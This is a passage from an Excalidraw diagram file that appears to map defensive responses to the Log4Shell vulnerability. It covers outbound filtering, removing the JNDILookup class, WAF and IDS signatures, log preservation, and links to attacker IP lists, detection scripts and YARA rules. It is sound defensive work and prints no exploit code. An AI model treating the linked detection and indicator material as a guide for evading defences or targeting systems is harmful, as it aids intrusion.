2045 | "strokeStyle": "dotted",
2046 | "roughness": 1,
2047 | "opacity": 100,
2048 | "groupIds": [],
2049 | "strokeSharpness": "sharp",
2050 | "seed": 547687360,
2051 | "version": 255,
2052 | "versionNonce": 1400684608,
2053 | "isDeleted": false,
2054 | "boundElements": null,
2055 | "updated": 1639775616378,
2056 | "text": "https://crowdsec.net/log4j-tracker/\nhttps://gist.github.com/blotus/f87ed46718bfdc634c9081110d243166\nhttps://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8\nhttps://github.com/CriticalPathSecurity/Zeek-Intelligence-Feeds/blob/master/\nlog4j_ip.intel",
2057 | "fontSize": 12.890243902439023,
2058 | "fontFamily": 3,
2059 | "textAlign": "center",
2060 | "verticalAlign": "top",
2061 | "baseline": 72,
2062 | "containerId": null,
2063 | "originalText": "https://crowdsec.net/log4j-tracker/\nhttps://gist.github.com/blotus/f87ed46718bfdc634c9081110d243166\nhttps://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8\nhttps://github.com/CriticalPathSecurity/Zeek-Intelligence-Feeds/blob/master/\nlog4j_ip.intel"
2064 | },
2065 | {
2066 | "id": "xGFurycOtwbFQLdb3NUj0",
2067 | "type": "text",
2068 | "x": 1693.5,
2069 | "y": 253.8750000000001,
2070 | "width": 393,
2071 | "height": 20,
2072 | "angle": 0,
2073 | "strokeColor": "#000000",
2074 | "backgroundColor": "#ced4da",
2075 | "fillStyle": "hachure",
2076 | "strokeWidth": 1,
2077 | "strokeStyle": "dotted",
2078 | "roughness": 1,
2079 | "opacity": 100,
2080 | "groupIds": [],
2081 | "strokeSharpness": "sharp",
2082 | "seed": 235869120,
2083 | "version": 132,
2084 | "versionNonce": 414253120,
2085 | "isDeleted": false,
2086 | "boundElements": null,
2087 | "updated": 1639775608002,
2088 | "text": "List of IP/domains exploiting log4shell (CrowdSec)",
2089 | "fontSize": 16,
2090 | "fontFamily": 1,
2091 | "textAlign": "center",
2092 | "verticalAlign": "top",
2093 | "baseline": 14,
2094 | "containerId": null,
2095 | "originalText": "List of IP/domains exploiting log4shell (CrowdSec)"
2096 | },
2097 | {
2098 | "type": "rectangle",
2099 | "version": 642,
2100 | "versionNonce": 1198975040,
2101 | "isDeleted": false,
2102 | "id": "TizQisPZTVz-9sKiAX0Qo",
2103 | "fillStyle": "solid",
2104 | "strokeWidth": 1,
2105 | "strokeStyle": "dotted",
2106 | "roughness": 1,
2107 | "opacity": 100,
2108 | "angle": 0,
2109 | "x": 147.58665573990822,
2110 | "y": 740.3811106826715,
2111 | "strokeColor": "#000000",
2112 | "backgroundColor": "transparent",
2113 | "width": 318.57668852018355,
2114 | "height": 26.987778634657406,
2115 | "seed": 780552256,
2116 | "groupIds": [],
2117 | "strokeSharpness": "sharp",
2118 | "boundElements": [],
2119 | "updated": 1639775213774
2120 | },
2121 | {
2122 | "type": "rectangle",
2123 | "version": 1358,
2124 | "versionNonce": 1039842240,
2125 | "isDeleted": false,
2126 | "id": "LEcS3ZF77MEP4BYS1Qx3M",
2127 | "fillStyle": "hachure",
2128 | "strokeWidth": 1,
2129 | "strokeStyle": "dashed",
2130 | "roughness": 1,
2131 | "opacity": 100,
2132 | "angle": 0,
2133 | "x": 128.48275613848068,
2134 | "y": 562.2261312508693,
2135 | "strokeColor": "#364fc7",
2136 | "backgroundColor": "transparent",
2137 | "width": 343.0344877230387,
2138 | "height": 140.797737498262,
2139 | "seed": 1101462464,
2140 | "groupIds": [],
2141 | "strokeSharpness": "sharp",
2142 | "boundElements": [
2143 | {
2144 | "id": "Q6md-qcZ7KTZbylx5Wsq2",
2145 | "type": "text"
2146 | },
2147 | {
2148 | "id": "Q6md-qcZ7KTZbylx5Wsq2",
2149 | "type": "text"
2150 | },
2151 | {
2152 | "id": "Q6md-qcZ7KTZbylx5Wsq2",
2153 | "type": "text"
2154 | },
2155 | {
2156 | "id": "Q6md-qcZ7KTZbylx5Wsq2",
2157 | "type": "text"
2158 | },
2159 | {
2160 | "id": "Q6md-qcZ7KTZbylx5Wsq2",
2161 | "type": "text"
2162 | },
2163 | {
2164 | "id": "Q6md-qcZ7KTZbylx5Wsq2",
2165 | "type": "text"
2166 | },
2167 | {
2168 | "type": "text",
2169 | "id": "Q6md-qcZ7KTZbylx5Wsq2"
2170 | }
2171 | ],
2172 | "updated": 1639775213774
2173 | },
2174 | {
2175 | "type": "text",
2176 | "version": 1148,
2177 | "versionNonce": 1089462336,
2178 | "isDeleted": false,
2179 | "id": "Q6md-qcZ7KTZbylx5Wsq2",
2180 | "fillStyle": "hachure",
2181 | "strokeWidth": 1,
2182 | "strokeStyle": "dashed",
2183 | "roughness": 1,
2184 | "opacity": 100,
2185 | "angle": 0,
2186 | "x": 158.4995,
2187 | "y": 595.1250000000001,
2188 | "strokeColor": "#364fc7",
2189 | "backgroundColor": "transparent",
2190 | "width": 283,
2191 | "height": 75,
2192 | "seed": 1294442560,
2193 | "groupIds": [],
2194 | "strokeSharpness": "sharp",
2195 | "boundElements": [],
2196 | "updated": 1639775213774,
2197 | "fontSize": 20,
2198 | "fontFamily": 1,
2199 | "text": "FILTER OUTBOUND\nCONNECTIONS \n(Firewall)",
2200 | "baseline": 68,
2201 | "textAlign": "center",
2202 | "verticalAlign": "middle",
2203 | "containerId": "LEcS3ZF77MEP4BYS1Qx3M",
2204 | "originalText": "FILTER OUTBOUND\nCONNECTIONS \n(Firewall)"
2205 | },
2206 | {
2207 | "type": "rectangle",
2208 | "version": 333,
2209 | "versionNonce": 277469248,
2210 | "isDeleted": false,
2211 | "id": "bb0is1Ztpl_KZGDnohTPW",
2212 | "fillStyle": "solid",
2213 | "strokeWidth": 1,
2214 | "strokeStyle": "dotted",
2215 | "roughness": 1,
2216 | "opacity": 100,
2217 | "angle": 0,
2218 | "x": 485.71165573990834,
2219 | "y": 723.5061106826715,
2220 | "strokeColor": "#000000",
2221 | "backgroundColor": "#ffffff",
2222 | "width": 354.82668852018355,
2223 | "height": 98.23777863465737,
2224 | "seed": 2039128128,
2225 | "groupIds": [],
2226 | "strokeSharpness": "sharp",
2227 | "boundElements": [],
2228 | "updated": 1639775213774
2229 | },
2230 | {
2231 | "type": "text",
2232 | "version": 452,
2233 | "versionNonce": 2010041280,
2234 | "isDeleted": false,
2235 | "id": "CPGbJkmp3MYdAciKY_CM-",
2236 | "fillStyle": "hachure",
2237 | "strokeWidth": 1,
2238 | "strokeStyle": "dotted",
2239 | "roughness": 1,
2240 | "opacity": 100,
2241 | "angle": 0,
2242 | "x": 486.25,
2243 | "y": 738.8750000000002,
2244 | "strokeColor": "#000000",
2245 | "backgroundColor": "#ced4da",
2246 | "width": 350,
2247 | "height": 80,
2248 | "seed": 822830016,
2249 | "groupIds": [],
2250 | "strokeSharpness": "sharp",
2251 | "boundElements": [],
2252 | "updated": 1639775213774,
2253 | "fontSize": 16,
2254 | "fontFamily": 1,
2255 | "text": "Conti and other threat actors\n have been seen targeting vCenters\n-> isolate vCenter interfaces \n-> limit interfaces to administration network",
2256 | "baseline": 74,
2257 | "textAlign": "center",
2258 | "verticalAlign": "top",
2259 | "containerId": null,
2260 | "originalText": "Conti and other threat actors\n have been seen targeting vCenters\n-> isolate vCenter interfaces \n-> limit interfaces to administration network"
2261 | },
2262 | {
2263 | "type": "rectangle",
2264 | "version": 678,
2265 | "versionNonce": 1243926592,
2266 | "isDeleted": false,
2267 | "id": "2GEBleW2ca4Oo_-0fnsME",
2268 | "fillStyle": "solid",
2269 | "strokeWidth": 1,
2270 | "strokeStyle": "dotted",
2271 | "roughness": 1,
2272 | "opacity": 100,
2273 | "angle": 0,
2274 | "x": 148.21165573990822,
2275 | "y": 775.3811106826715,
2276 | "strokeColor": "#000000",
2277 | "backgroundColor": "transparent",
2278 | "width": 318.57668852018355,
2279 | "height": 26.987778634657406,
2280 | "seed": 1789397056,
2281 | "groupIds": [],
2282 | "strokeSharpness": "sharp",
2283 | "boundElements": [],
2284 | "updated": 1639775213774
2285 | },
2286 | {
2287 | "type": "rectangle",
2288 | "version": 711,
2289 | "versionNonce": 1937724352,
2290 | "isDeleted": false,
2291 | "id": "yWr6cHlRpaLZCkj7hmvZ_",
2292 | "fillStyle": "solid",
2293 | "strokeWidth": 1,
2294 | "strokeStyle": "dotted",
2295 | "roughness": 1,
2296 | "opacity": 100,
2297 | "angle": 0,
2298 | "x": 148.21165573990822,
2299 | "y": 807.8811106826715,
2300 | "strokeColor": "#000000",
2301 | "backgroundColor": "transparent",
2302 | "width": 318.57668852018355,
2303 | "height": 35.73777863465741,
2304 | "seed": 929132608,
2305 | "groupIds": [],
2306 | "strokeSharpness": "sharp",
2307 | "boundElements": [],
2308 | "updated": 1639775213774
2309 | },
2310 | {
2311 | "type": "rectangle",
2312 | "version": 739,
2313 | "versionNonce": 94423104,
2314 | "isDeleted": false,
2315 | "id": "6QAh94eM83ye44BdPgsVd",
2316 | "fillStyle": "solid",
2317 | "strokeWidth": 1,
2318 | "strokeStyle": "dotted",
2319 | "roughness": 1,
2320 | "opacity": 100,
2321 | "angle": 0,
2322 | "x": 146.96165573990822,
2323 | "y": 857.2561106826715,
2324 | "strokeColor": "#000000",
2325 | "backgroundColor": "transparent",
2326 | "width": 318.57668852018355,
2327 | "height": 23.237778634657406,
2328 | "seed": 478797888,
2329 | "groupIds": [],
2330 | "strokeSharpness": "sharp",
2331 | "boundElements": [],
2332 | "updated": 1639775213774
2333 | },
2334 | {
2335 | "type": "rectangle",
2336 | "version": 1443,
2337 | "versionNonce": 1591590976,
2338 | "isDeleted": false,
2339 | "id": "2Mjdi_WsELZof0KLz-o9A",
2340 | "fillStyle": "hachure",
2341 | "strokeWidth": 1,
2342 | "strokeStyle": "dashed",
2343 | "roughness": 1,
2344 | "opacity": 100,
2345 | "angle": 0,
2346 | "x": -77.76724386151932,
2347 | "y": 613.4761312508692,
2348 | "strokeColor": "#364fc7",
2349 | "backgroundColor": "transparent",
2350 | "width": 183.0344877230387,
2351 | "height": 235,
2352 | "seed": 965073856,
2353 | "groupIds": [],
2354 | "strokeSharpness": "sharp",
2355 | "boundElements": [
2356 | {
2357 | "id": "_uIKhlxqMuLOxYMTrLaNf",
2358 | "type": "text"
2359 | },
2360 | {
2361 | "id": "_uIKhlxqMuLOxYMTrLaNf",
2362 | "type": "text"
2363 | },
2364 | {
2365 | "id": "_uIKhlxqMuLOxYMTrLaNf",
2366 | "type": "text"
2367 | },
2368 | {
2369 | "id": "_uIKhlxqMuLOxYMTrLaNf",
2370 | "type": "text"
2371 | },
2372 | {
2373 | "id": "_uIKhlxqMuLOxYMTrLaNf",
2374 | "type": "text"
2375 | },
2376 | {
2377 | "id": "_uIKhlxqMuLOxYMTrLaNf",
2378 | "type": "text"
2379 | },
2380 | {
2381 | "id": "_uIKhlxqMuLOxYMTrLaNf",
2382 | "type": "text"
2383 | },
2384 | {
2385 | "type": "text",
2386 | "id": "_uIKhlxqMuLOxYMTrLaNf"
2387 | }
2388 | ],
2389 | "updated": 1639775213774
2390 | },
2391 | {
2392 | "type": "text",
2393 | "version": 1281,
2394 | "versionNonce": 1460495296,
2395 | "isDeleted": false,
2396 | "id": "_uIKhlxqMuLOxYMTrLaNf",
2397 | "fillStyle": "hachure",
2398 | "strokeWidth": 1,
2399 | "strokeStyle": "dashed",
2400 | "roughness": 1,
2401 | "opacity": 100,
2402 | "angle": 0,
2403 | "x": -47.750499999999995,
2404 | "y": 655.9762500000002,
2405 | "strokeColor": "#364fc7",
2406 | "backgroundColor": "transparent",
2407 | "width": 123,
2408 | "height": 150,
2409 | "seed": 1864810560,
2410 | "groupIds": [],
2411 | "strokeSharpness": "sharp",
2412 | "boundElements": [],
2413 | "updated": 1639775213774,
2414 | "fontSize": 20,
2415 | "fontFamily": 1,
2416 | "text": "LIMIT \nOUTBOUND\nTRAFFIC \nTO PROXY\nFOR \nSERVER",
2417 | "baseline": 143,
2418 | "textAlign": "center",
2419 | "verticalAlign": "middle",
2420 | "containerId": "2Mjdi_WsELZof0KLz-o9A",
2421 | "originalText": "LIMIT OUTBOUNDTRAFFIC TO PROXY\nFOR SERVER"
2422 | },
2423 | {
2424 | "type": "text",
2425 | "version": 460,
2426 | "versionNonce": 1975236672,
2427 | "isDeleted": false,
2428 | "id": "KjS6Wb09G1elmPc5DPat-",
2429 | "fillStyle": "hachure",
2430 | "strokeWidth": 1,
2431 | "strokeStyle": "dotted",
2432 | "roughness": 1,
2433 | "opacity": 100,
2434 | "angle": 0,
2435 | "x": 1113.25,
2436 | "y": 450.1250000000001,
2437 | "strokeColor": "#000000",
2438 | "backgroundColor": "#ced4da",
2439 | "width": 281,
2440 | "height": 120,
2441 | "seed": 1724708928,
2442 | "groupIds": [],
2443 | "strokeSharpness": "sharp",
2444 | "boundElements": [],
2445 | "updated": 1639775213774,
2446 | "fontSize": 16,
2447 | "fontFamily": 1,
2448 | "text": "List of WAF editors implementing\n protections : \nAWS, CloudFlare, Nutanix, F5\nGCloud Armor WAF, Barracuda\nHaproxy, modSecurity, Fortiweb, etc.\n",
2449 | "baseline": 114,
2450 | "textAlign": "center",
2451 | "verticalAlign": "top",
2452 | "containerId": null,
2453 | "originalText": "List of WAF editors implementing\n protections : \nAWS, CloudFlare, Nutanix, F5\nGCloud Armor WAF, Barracuda\nHaproxy, modSecurity, Fortiweb, etc.\n"
2454 | },
2455 | {
2456 | "type": "rectangle",
2457 | "version": 458,
2458 | "versionNonce": 472617920,
2459 | "isDeleted": false,
2460 | "id": "h_YfAQcWpj68FWw3BcDHf",
2461 | "fillStyle": "solid",
2462 | "strokeWidth": 1,
2463 | "strokeStyle": "dotted",
2464 | "roughness": 1,
2465 | "opacity": 100,
2466 | "angle": 0,
2467 | "x": 1635.7116557399083,
2468 | "y": 214.75611068267136,
2469 | "strokeColor": "#000000",
2470 | "backgroundColor": "transparent",
2471 | "width": 491.07668852018367,
2472 | "height": 34.48777863465739,
2473 | "seed": 1613022144,
2474 | "groupIds": [],
2475 | "strokeSharpness": "sharp",
2476 | "boundElements": [],
2477 | "updated": 1639775521390
2478 | },
2479 | {
2480 | "type": "rectangle",
2481 | "version": 721,
2482 | "versionNonce": 1847242816,
2483 | "isDeleted": false,
2484 | "id": "ock_nFjk-juxSfg66FQus",
2485 | "fillStyle": "solid",
2486 | "strokeWidth": 1,
2487 | "strokeStyle": "dotted",
2488 | "roughness": 1,
2489 | "opacity": 100,
2490 | "angle": 0,
2491 | "x": 1131.961655739908,
2492 | "y": 227.88111068267142,
2493 | "strokeColor": "#000000",
2494 | "backgroundColor": "transparent",
2495 | "width": 212.3266885201835,
2496 | "height": 41.987778634657374,
2497 | "seed": 1491607616,
2498 | "groupIds": [],
2499 | "strokeSharpness": "sharp",
2500 | "boundElements": [],
2501 | "updated": 1639775213774
2502 | },
2503 | {
2504 | "type": "rectangle",
2505 | "version": 752,
2506 | "versionNonce": 441938880,
2507 | "isDeleted": false,
2508 | "id": "kH1zyEIasvhhgv47V3Iae",
2509 | "fillStyle": "solid",
2510 | "strokeWidth": 1,
2511 | "strokeStyle": "dotted",
2512 | "roughness": 1,
2513 | "opacity": 100,
2514 | "angle": 0,
2515 | "x": 1112.586655739908,
2516 | "y": 291.6311106826714,
2517 | "strokeColor": "#000000",
2518 | "backgroundColor": "transparent",
2519 | "width": 264.82668852018355,
2520 | "height": 43.237778634657374,
2521 | "seed": 1946930112,
2522 | "groupIds": [],
2523 | "strokeSharpness": "sharp",
2524 | "boundElements": [],
2525 | "updated": 1639775213774
2526 | },
2527 | {
2528 | "type": "rectangle",
2529 | "version": 793,
2530 | "versionNonce": 1876600896,
2531 | "isDeleted": false,
2532 | "id": "Xo46L36j25IeDF6UVUdUm",
2533 | "fillStyle": "solid",
2534 | "strokeWidth": 1,
2535 | "strokeStyle": "dotted",
2536 | "roughness": 1,
2537 | "opacity": 100,
2538 | "angle": 0,
2539 | "x": 1115.086655739908,
2540 | "y": 364.7561106826714,
2541 | "strokeColor": "#000000",
2542 | "backgroundColor": "transparent",
2543 | "width": 262.32668852018355,
2544 | "height": 65.7377786346574,
2545 | "seed": 1394398144,
2546 | "groupIds": [],
2547 | "strokeSharpness": "sharp",
2548 | "boundElements": [],
2549 | "updated": 1639775213774
2550 | },
2551 | {
2552 | "type": "rectangle",
2553 | "version": 858,
2554 | "versionNonce": 246610880,
2555 | "isDeleted": false,
2556 | "id": "GDziDuKswelQPQvfYs53E",
2557 | "fillStyle": "solid",
2558 | "strokeWidth": 1,
2559 | "strokeStyle": "dotted",
2560 | "roughness": 1,
2561 | "opacity": 100,
2562 | "angle": 0,
2563 | "x": 1120.086655739908,
2564 | "y": 446.0061106826714,
2565 | "strokeColor": "#000000",
2566 | "backgroundColor": "transparent",
2567 | "width": 268.5766885201836,
2568 | "height": 105.73777863465743,
2569 | "seed": 830178240,
2570 | "groupIds": [],
2571 | "strokeSharpness": "sharp",
2572 | "boundElements": [],
2573 | "updated": 1639775213775
2574 | },
2575 | {
2576 | "type": "rectangle",
2577 | "version": 764,
2578 | "versionNonce": 651927616,
2579 | "isDeleted": false,
2580 | "id": "Aa8dOv6B53iRqLt8NBG7b",
2581 | "fillStyle": "solid",
2582 | "strokeWidth": 1,
2583 | "strokeStyle": "dotted",
2584 | "roughness": 1,
2585 | "opacity": 100,
2586 | "angle": 0,
2587 | "x": 1398.836655739908,
2588 | "y": 227.88111068267142,
2589 | "strokeColor": "#000000",
2590 | "backgroundColor": "transparent",
2591 | "width": 212.3266885201835,
2592 | "height": 86.98777863465739,
2593 | "seed": 2023391296,
2594 | "groupIds": [],
2595 | "strokeSharpness": "sharp",
2596 | "boundElements": [],
2597 | "updated": 1639775213775
2598 | },
2599 | {
2600 | "id": "BWmX25l3X_W5TfDJBqvXc",
2601 | "type": "text",
2602 | "x": 1417.5,
2603 | "y": 240.1250000000001,
2604 | "width": 191,
2605 | "height": 72,
2606 | "angle": 0,
2607 | "strokeColor": "#000000",
2608 | "backgroundColor": "transparent",
2609 | "fillStyle": "hachure",
2610 | "strokeWidth": 1,
2611 | "strokeStyle": "dotted",
2612 | "roughness": 1,
2613 | "opacity": 100,
2614 | "groupIds": [],
2615 | "strokeSharpness": "sharp",
2616 | "seed": 480410560,
2617 | "version": 143,
2618 | "versionNonce": 2120057792,
2619 | "isDeleted": false,
2620 | "boundElements": null,
2621 | "updated": 1639775213775,
2622 | "text": "Activate signature \ndefence against Log4Shell :\nSnort, Firepower, Fortigate,\nPalo Alto, Check Point",
2623 | "fontSize": 14.146341463414634,
2624 | "fontFamily": 1,
2625 | "textAlign": "left",
2626 | "verticalAlign": "top",
2627 | "baseline": 67,
2628 | "containerId": null,
2629 | "originalText": "Activate signature \ndefence against Log4Shell :\nSnort, Firepower, Fortigate,\nPalo Alto, Check Point"
2630 | },
2631 | {
2632 | "id": "ik3bLr1OYPyxndihtzoyE",
2633 | "type": "text",
2634 | "x": 1313.75,
2635 | "y": 892.2131863560735,
2636 | "width": 179.2840909090911,
2637 | "height": 23.338757396449736,
2638 | "angle": 0,
2639 | "strokeColor": "#000000",
2640 | "backgroundColor": "transparent",
2641 | "fillStyle": "hachure",
2642 | "strokeWidth": 1,
2643 | "strokeStyle": "dotted",
2644 | "roughness": 1,
2645 | "opacity": 100,
2646 | "groupIds": [],
2647 | "strokeSharpness": "sharp",
2648 | "seed": 721073088,
2649 | "version": 148,
2650 | "versionNonce": 1123915840,
2651 | "isDeleted": false,
2652 | "boundElements": null,
2653 | "updated": 1639775213775,
2654 | "text": "https://gist.github.com/Neo23x0/\ne4c8b03ff8cdf1fa63b7d15db6e3860b",
2655 | "fontSize": 9.524726585330718,
2656 | "fontFamily": 3,
2657 | "textAlign": "left",
2658 | "verticalAlign": "top",
2659 | "baseline": 21.338757396449736,
2660 | "containerId": null,
2661 | "originalText": "https://gist.github.com/Neo23x0/\ne4c8b03ff8cdf1fa63b7d15db6e3860b"
2662 | },
2663 | {
2664 | "type": "rectangle",
2665 | "version": 556,
2666 | "versionNonce": 662113216,
2667 | "isDeleted": false,
2668 | "id": "9GwQUA0MCpkSPZ_-2zoML",
2669 | "fillStyle": "solid",
2670 | "strokeWidth": 1,
2671 | "strokeStyle": "dotted",
2672 | "roughness": 1,
2673 | "opacity": 100,
2674 | "angle": 0,
2675 | "x": 1547.3885068776933,
2676 | "y": 733.5061106826715,
2677 | "strokeColor": "#000000",
2678 | "backgroundColor": "transparent",
2679 | "width": 208.97298624461274,
2680 | "height": 215.7377786346574,
2681 | "seed": 2135552064,
2682 | "groupIds": [],
2683 | "strokeSharpness": "sharp",
2684 | "boundElements": [],
2685 | "updated": 1639775213775
2686 | },
2687 | {
2688 | "type": "text",
2689 | "version": 456,
2690 | "versionNonce": 2015400000,
2691 | "isDeleted": false,
2692 | "id": "0MJN7b7Bo17XssktAlNQC",
2693 | "fillStyle": "solid",
2694 | "strokeWidth": 1,
2695 | "strokeStyle": "dotted",
2696 | "roughness": 1,
2697 | "opacity": 100,
2698 | "angle": 0,
2699 | "x": 1311.25,
2700 | "y": 829.0973291721716,
2701 | "strokeColor": "#000000",
2702 | "backgroundColor": "#ffffff",
2703 | "width": 175,
2704 | "height": 60,
2705 | "seed": 433275840,
2706 | "groupIds": [],
2707 | "strokeSharpness": "sharp",
2708 | "boundElements": [],
2709 | "updated": 1639775213775,
2710 | "fontSize": 15.82213666226279,
2711 | "fontFamily": 1,
2712 | "text": "Good source of \nideas for detection / \ngrep patterns",
2713 | "baseline": 54,
2714 | "textAlign": "center",
2715 | "verticalAlign": "top",
2716 | "containerId": null,
2717 | "originalText": "Good source of \nideas for detection / \ngrep patterns"
2718 | },
2719 | {
2720 | "type": "text",
2721 | "version": 252,
2722 | "versionNonce": 69178304,
2723 | "isDeleted": false,
2724 | "id": "a6XsgBSZ5CdcrNIVWPV77",
2725 | "fillStyle": "hachure",
2726 | "strokeWidth": 1,
2727 | "strokeStyle": "dotted",
2728 | "roughness": 1,
2729 | "opacity": 100,
2730 | "angle": 0,
2731 | "x": 1371.375,
2732 | "y": 660.1250000000001,
2733 | "strokeColor": "#1864ab",
2734 | "backgroundColor": "#ced4da",
2735 | "width": 271,
2736 | "height": 40,
2737 | "seed": 1773338688,
2738 | "groupIds": [],
2739 | "strokeSharpness": "sharp",
2740 | "boundElements": [],
2741 | "updated": 1639775213775,
2742 | "fontSize": 16,
2743 | "fontFamily": 1,
2744 | "text": "Copy/backup log folders\nIf found vulnerable : investigate !",
2745 | "baseline": 34,
2746 | "textAlign": "center",
2747 | "verticalAlign": "top",
2748 | "containerId": null,
2749 | "originalText": "Copy/backup log folders\nIf found vulnerable : investigate !"
2750 | },
2751 | {
2752 | "type": "rectangle",
2753 | "version": 868,
2754 | "versionNonce": 2020088768,
2755 | "isDeleted": false,
2756 | "id": "Btl_JVq4VyPz1ezBHopNo",
2757 | "fillStyle": "solid",
2758 | "strokeWidth": 1,
2759 | "strokeStyle": "dotted",
2760 | "roughness": 1,
2761 | "opacity": 100,
2762 | "angle": 0,
2763 | "x": 1338.211655739908,
2764 | "y": 661.0061106826714,
2765 | "strokeColor": "#1864ab",
2766 | "backgroundColor": "transparent",
2767 | "width": 317.32668852018355,
2768 | "height": 35.73777863465741,
2769 | "seed": 1335772096,
2770 | "groupIds": [],
2771 | "strokeSharpness": "sharp",
2772 | "boundElements": [],
2773 | "updated": 1639775646713
2774 | },
2775 | {
2776 | "id": "06jzbLgf29UXvvrGy-dc_",
2777 | "type": "text",
2778 | "x": 1303.75,
2779 | "y": 963.1981225296445,
2780 | "width": 199.25,
2781 | "height": 29.92687747035573,
2782 | "angle": 0,
2783 | "strokeColor": "#000000",
2784 | "backgroundColor": "transparent",
2785 | "fillStyle": "hachure",
2786 | "strokeWidth": 1,
2787 | "strokeStyle": "dotted",
2788 | "roughness": 1,
2789 | "opacity": 100,
2790 | "groupIds": [],
2791 | "strokeSharpness": "sharp",
2792 | "seed": 257225664,
2793 | "version": 62,
2794 | "versionNonce": 1884256320,
2795 | "isDeleted": false,
2796 | "boundElements": null,
2797 | "updated": 1639775213777,
2798 | "text": "https://github.com/Neo23x0/\nlog4shell-detector",
2799 | "fontSize": 12.60079051383399,
2800 | "fontFamily": 3,
2801 | "textAlign": "left",
2802 | "verticalAlign": "top",
2803 | "baseline": 26.92687747035573,
2804 | "containerId": null,
2805 | "originalText": "https://github.com/Neo23x0/\nlog4shell-detector"
2806 | },
2807 | {
2808 | "type": "text",
2809 | "version": 511,
2810 | "versionNonce": 414395328,
2811 | "isDeleted": false,
2812 | "id": "nl5eNGQeKY1RI2rksSXA9",
2813 | "fillStyle": "solid",
2814 | "strokeWidth": 1,
2815 | "strokeStyle": "dotted",
2816 | "roughness": 1,
2817 | "opacity": 100,
2818 | "angle": 0,
2819 | "x": 1286.75,
2820 | "y": 931.3750000000002,
2821 | "strokeColor": "#000000",
2822 | "backgroundColor": "#ffffff",
2823 | "width": 224,
2824 | "height": 20,
2825 | "seed": 763635776,
2826 | "groupIds": [],
2827 | "strokeSharpness": "sharp",
2828 | "boundElements": [],
2829 | "updated": 1639775213777,
2830 | "fontSize": 15.82213666226279,
2831 | "fontFamily": 1,
2832 | "text": "Exploitation detection script",
2833 | "baseline": 14,
2834 | "textAlign": "center",
2835 | "verticalAlign": "top",
2836 | "containerId": null,
2837 | "originalText": "Exploitation detection script"
2838 | },
2839 | {
2840 | "id": "cxTgvkrPGXxk2JE--Yvks",
2841 | "type": "text",
2842 | "x": 1622.5,
2843 | "y": 993.1516203703706,
2844 | "width": 340.75,
2845 | "height": 29.973379629629637,
2846 | "angle": 0,
2847 | "strokeColor": "#000000",
2848 | "backgroundColor": "transparent",
2849 | "fillStyle": "hachure",
2850 | "strokeWidth": 1,
2851 | "strokeStyle": "dotted",
2852 | "roughness": 1,
2853 | "opacity": 100,
2854 | "groupIds": [],
2855 | "strokeSharpness": "sharp",
2856 | "seed": 383987776,
2857 | "version": 147,
2858 | "versionNonce": 1614180416,
2859 | "isDeleted": false,
2860 | "boundElements": null,
2861 | "updated": 1639775213777,
2862 | "text": "https://github.com/Neo23x0/signature-base/\nblob/master/yara/expl_log4j_cve_2021_44228.yar",
2863 | "fontSize": 12.62037037037037,
2864 | "fontFamily": 3,
2865 | "textAlign": "left",
2866 | "verticalAlign": "top",
2867 | "baseline": 26.973379629629637,
2868 | "containerId": null,
2869 | "originalText": "https://github.com/Neo23x0/signature-base/\nblob/master/yara/expl_log4j_cve_2021_44228.yar"
2870 | },
2871 | {
2872 | "id": "cBrZpuyqgEWaRKeWCHWyC",
2873 | "type": "text",
2874 | "x": 1630,
2875 | "y": 971.3750000000002,
2876 | "width": 348,
2877 | "height": 20,
2878 | "angle": 0,
2879 | "strokeColor": "#000000",
2880 | "backgroundColor": "transparent",
2881 | "fillStyle": "hachure",
2882 | "strokeWidth": 1,
2883 | "strokeStyle": "dotted",
2884 | "roughness": 1,
2885 | "opacity": 100,
2886 | "groupIds": [],
2887 | "strokeSharpness": "sharp",
2888 | "seed": 1067060160,
2889 | "version": 78,
2890 | "versionNonce": 953660352,
2891 | "isDeleted": false,
2892 | "boundElements": null,
2893 | "updated": 1639775213778,
2894 | "text": "Yara rules for detection and investigation !",
2895 | "fontSize": 16,
2896 | "fontFamily": 1,
2897 | "textAlign": "left",
2898 | "verticalAlign": "top",
2899 | "baseline": 14,
2900 | "containerId": null,
2901 | "originalText": "Yara rules for detection and investigation !"
2902 | },
2903 | {
2904 | "type": "rectangle",
2905 | "version": 495,
2906 | "versionNonce": 679372864,
2907 | "isDeleted": false,
2908 | "id": "eFBr7cV0PTPoPYWTumOZo",
2909 | "fillStyle": "solid",
2910 | "strokeWidth": 1,
2911 | "strokeStyle": "dotted",
2912 | "roughness": 1,
2913 | "opacity": 100,
2914 | "angle": 0,
2915 | "x": 1617.3885068776938,
2916 | "y": 963.5061106826715,
2917 | "strokeColor": "#000000",
2918 | "backgroundColor": "transparent",
2919 | "width": 366.4729862446126,
2920 | "height": 70.73777863465737,
2921 | "seed": 300999616,
2922 | "groupIds": [],
2923 | "strokeSharpness": "sharp",
2924 | "boundElements": [],
2925 | "updated": 1639775213778
2926 | },
2927 | {
2928 | "type": "rectangle",
2929 | "version": 417,
2930 | "versionNonce": 701350848,
2931 | "isDeleted": false,
2932 | "id": "LzycXbSZA65r8cmGC1UMP",
2933 | "fillStyle": "solid",
2934 | "strokeWidth": 1,
2935 | "strokeStyle": "dotted",
2936 | "roughness": 1,
2937 | "opacity": 100,
2938 | "angle": 0,
2939 | "x": 823.8366557399083,
2940 | "y": 379.1311106826715,
2941 | "strokeColor": "#000000",
2942 | "backgroundColor": "#ffffff",
2943 | "width": 219.82668852018358,
2944 | "height": 121.98777863465739,
2945 | "seed": 359443392,
2946 | "groupIds": [],
2947 | "strokeSharpness": "sharp",
2948 | "boundElements": [],
2949 | "updated": 1639775213778
2950 | },
2951 | {
2952 | "type": "text",
2953 | "version": 300,
2954 | "versionNonce": 1974556736,
2955 | "isDeleted": false,
2956 | "id": "Tvn1tGCXVZoRYKhRLAuAm",
2957 | "fillStyle": "solid",
2958 | "strokeWidth": 1,
2959 | "strokeStyle": "dotted",
2960 | "roughness": 1,
2961 | "opacity": 100,
2962 | "angle": 0,
2963 | "x": 845,
2964 | "y": 402.00251893586733,
2965 | "strokeColor": "#000000",
2966 | "backgroundColor": "#ffffff",
2967 | "width": 180,
2968 | "height": 36,
2969 | "seed": 603947072,
2970 | "groupIds": [],
2971 | "strokeSharpness": "sharp",
2972 | "boundElements": [],
2973 | "updated": 1639775213778,
2974 | "fontSize": 14.497984851306196,
2975 | "fontFamily": 1,
2976 | "text": "Remove the JNDILookup \nclass from classpath",
2977 | "baseline": 31,
2978 | "textAlign": "center",
2979 | "verticalAlign": "top",
